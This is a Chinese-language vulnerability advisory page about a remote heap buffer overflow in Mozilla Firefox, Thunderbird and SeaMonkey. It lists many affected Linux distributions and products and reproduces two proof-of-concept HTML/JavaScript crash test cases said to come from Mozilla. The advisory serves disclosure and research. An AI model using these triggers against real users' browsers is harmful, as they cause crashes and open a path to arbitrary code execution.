影响版本:
Ubuntu Ubuntu Linux 9.10 sparc Ubuntu Ubuntu Linux 9.10 powerpc Ubuntu Ubuntu Linux 9.10 lpia Ubuntu Ubuntu Linux 9.10 i386 Ubuntu Ubuntu Linux 9.10 ARM Ubuntu Ubuntu Linux 9.10 amd64 Ubuntu Ubuntu Linux 8.04 LTS sparc Ubuntu Ubuntu Linux 8.04 LTS powerpc Ubuntu Ubuntu Linux 8.04 LTS lpia Ubuntu Ubuntu Linux 8.04 LTS i386 Ubuntu Ubuntu Linux 8.04 LTS amd64 Ubuntu Ubuntu Linux 10.10 powerpc Ubuntu Ubuntu Linux 10.10 i386 Ubuntu Ubuntu Linux 10.10 ARM Ubuntu Ubuntu Linux 10.10 amd64 Ubuntu Ubuntu Linux 10.04 sparc Ubuntu Ubuntu Linux 10.04 powerpc Ubuntu Ubuntu Linux 10.04 i386 Ubuntu Ubuntu Linux 10.04 ARM Ubuntu Ubuntu Linux 10.04 amd64 SuSE SUSE Linux Enterprise SDK 11 SP1 SuSE SUSE Linux Enterprise SDK 11 SuSE SUSE Linux Enterprise SDK 10 SP3 SuSE openSUSE 11.3 Sun Solaris 11 Express Sun Solaris 10_x86 Sun Solaris 10_sparc Slackware Linux x86_64 -current Slackware Linux 13.1 x86_64 Slackware Linux 13.1 Slackware Linux 13.0 x86_64 Slackware Linux 13.0 Slackware Linux 12.2 Slackware Linux -current S.u.S.E. SUSE Linux Enterprise Server 11 SP1 S.u.S.E. SUSE Linux Enterprise Server 11 Linux kernel 2.6.5 S.u.S.E. SUSE Linux Enterprise Server 10 SP3 S.u.S.E. SUSE Linux Enterprise Desktop 11 SP1 Linux kernel 2.6.5 S.u.S.E. SUSE Linux Enterprise Desktop 11 S.u.S.E. SUSE Linux Enterprise Desktop 10 SP3 S.u.S.E. openSUSE 11.2 S.u.S.E. openSUSE 11.1 RedHat Enterprise Linux WS 4 RedHat Enterprise Linux WS 3 RedHat Enterprise Linux Optional Productivity Application 5 server RedHat Enterprise Linux ES 4.8.z RedHat Enterprise Linux ES 4 RedHat Enterprise Linux ES 3 RedHat Enterprise Linux Desktop Workstation 5 client RedHat Enterprise Linux AS 4.8.z RedHat Enterprise Linux AS 4 RedHat Enterprise Linux AS 3 RedHat Enterprise Linux Desktop version 4 RedHat Enterprise Linux 5 server RedHat Desktop 4.0 RedHat Desktop 3.0 Red Hat Fedora 14 Red Hat Fedora 13 Red Hat Fedora 12 Red Hat Enterprise Linux Workstation Optional 6 Red Hat Enterprise Linux Workstation 6 Red Hat Enterprise Linux Server Optional 6 Red Hat Enterprise Linux Server 6 Red Hat Enterprise Linux HPC Node Optional 6 Red Hat Enterprise Linux Desktop Optional 6 Red Hat Enterprise Linux Desktop 6 Red Hat Enterprise Linux Desktop 5 client Mozilla Thunderbird 3.1.5 Mozilla Thunderbird 3.1.4 Mozilla Thunderbird 3.0.9 Mozilla Thunderbird 3.0.5 Mozilla Thunderbird 3.0.4 Mozilla Thunderbird 3.0.2 Mozilla Thunderbird 3.0.1 Mozilla Thunderbird 3.1.3 Mozilla Thunderbird 3.1.2 Mozilla Thunderbird 3.1.2 Mozilla Thunderbird 3.1.1 Mozilla Thunderbird 3.0.7 Mozilla Thunderbird 3.0.6 Mozilla Thunderbird 3.0 Mozilla SeaMonkey 2.0.9 Mozilla SeaMonkey 2.0.5 Mozilla SeaMonkey 2.0.4 Mozilla SeaMonkey 2.0.3 Mozilla SeaMonkey 2.0.2 Mozilla SeaMonkey 2.0.1 Mozilla SeaMonkey 2.0.7 Mozilla SeaMonkey 2.0.6 Mozilla SeaMonkey 2.0 Rc2 Mozilla SeaMonkey 2.0 Rc1 Mozilla SeaMonkey 2.0 Beta 2 Mozilla SeaMonkey 2.0 Beta 1 Mozilla SeaMonkey 2.0 Alpha 3 Mozilla SeaMonkey 2.0 Alpha 2 Mozilla SeaMonkey 2.0 Alpha 1 Mozilla SeaMonkey 2.0 Mozilla Firefox 3.6.10 Mozilla Firefox 3.6.9 Mozilla Firefox 3.6.8 Mozilla Firefox 3.6.6 Mozilla Firefox 3.6.4 Mozilla Firefox 3.6.3 Mozilla Firefox 3.6.2 Mozilla Firefox 3.6.2 Mozilla Firefox 3.5.14 Mozilla Firefox 3.5.10 Mozilla Firefox 3.5.10 Mozilla Firefox 3.5.9 Mozilla Firefox 3.5.8 Mozilla Firefox 3.5.7 Mozilla Firefox 3.5.6 Mozilla Firefox 3.5.5 Mozilla Firefox 3.5.4 Mozilla Firefox 3.5.3 Mozilla Firefox 3.5.2 Mozilla Firefox 3.5.1 Mozilla Firefox 3.5 Mozilla Firefox 3.6.7 Mozilla Firefox 3.6.6 Mozilla Firefox 3.6.11 Mozilla Firefox 3.6 Mozilla Firefox 3.5.12 Mozilla Firefox 3.5.11 MandrakeSoft Linux Mandrake 2010.1 x86_64 MandrakeSoft Linux Mandrake 2010.1 MandrakeSoft Linux Mandrake 2010.0 x86_64 MandrakeSoft Linux Mandrake 2010.0 MandrakeSoft Linux Mandrake 2009.0 x86_64 MandrakeSoft Linux Mandrake 2009.0 MandrakeSoft Enterprise Server 5 x86_64 MandrakeSoft Enterprise Server 5 Debian Linux 5.0 sparc Debian Linux 5.0 s/390 Debian Linux 5.0 powerpc Debian Linux 5.0 mipsel Debian Linux 5.0 mips Debian Linux 5.0 m68k Debian Linux 5.0 ia-64 Debian Linux 5.0 ia-32 Debian Linux 5.0 hppa Debian Linux 5.0 armel Debian Linux 5.0 arm Debian Linux 5.0 amd64 Debian Linux 5.0 alpha Debian Linux 5.0 Avaya Messaging Storage Server MSS 5.1 Avaya Messaging Storage Server MSS 4.1 Avaya Message Networking 5.2.1 Avaya Message Networking MN 3.1 Avaya IQ 5.1 Avaya IQ 5 Avaya Intuity AUDIX LX 2.0 SP2 Avaya Intuity AUDIX LX 2.0 SP1 Avaya Communication Server 1000 Telephony Manager 0 Avaya Aura System Manager 6.0 SP1 Avaya Aura System Manager 5.2 Avaya Aura Session Manager 6.0 Avaya Aura Session Manager 5.2 Avaya Aura Session Manager 1.1 Avaya Aura Presence Services 6.0
漏洞描述:
Mozilla Firefox是容易远程堆缓冲区溢出漏洞。 成功的攻击会允许攻击者运行在运行应用程序的用户上下文任意代码。 失败的攻击可能导致拒绝服务条件。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
这个问题目前正在利用在野外。 以下证明,可用(从Mozilla测试用例)的概念代码: <html><body> <script> function G(str){ var cobj=document.createElement(str); document.body.appendChild(cobj); cobj.scrollWidth; } function crashme() { document.write("fooFOO"); G("a"); document.write("<a lang></a>a"); G("base"); document.write("barBAR"); G("audio"); } </script> <script>crashme();</script> </body> </html> <html><body> <script> function getatts(str){ var cobj=document.createElement(str); cobj.id="testcase"; document.body.appendChild(cobj); var obj=document.getElementById("testcase"); var atts = new Array(); for(p in obj){ if(typeof(obj[p])=="string"){ atts.push(p); } } document.body.removeChild(cobj); return atts; } function crashme() { var tags = new Array("audio", "a", "base"); for (inx = 0; inx < 0x8964; inx++) { for (i = 0; i < tags.length; i++) { var atts = getatts(tags); for (j = 0; j < atts.length; j++) { var html = "<" + tags + " " + atts[j] + "=a></" + tags + ">" + tags; document.write(html); } } } } </script> <button onclick="crashme();">Crash Me!</button> </body></html>
0 条评论。